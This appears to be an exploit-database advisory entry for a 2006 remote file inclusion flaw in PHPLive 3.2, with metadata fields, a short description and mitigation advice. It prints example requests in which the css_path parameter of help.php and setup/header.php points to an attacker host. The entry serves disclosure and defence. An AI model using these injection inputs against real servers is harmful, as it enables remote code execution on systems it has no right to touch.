vendor:
PHPLive
by:
magnific
7,5
CVSS
HIGH
Remote Injection Vulnerability
N/A
CWE
Product Name: PHPLive
Affected Version From: all
Affected Version To: all
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
PHPLive 3.2 Remote Injection Vulnerability
Some variables are not properly sanitized before being used. Here you will find the variables not properly sanitized: help.php?css_path=htt://attacker setup/header.php?css_path=htt://attacker
Mitigation:
Sanitize the variable $css_path, in all files affecteds. Active SAFE_MODE on server, for local security.
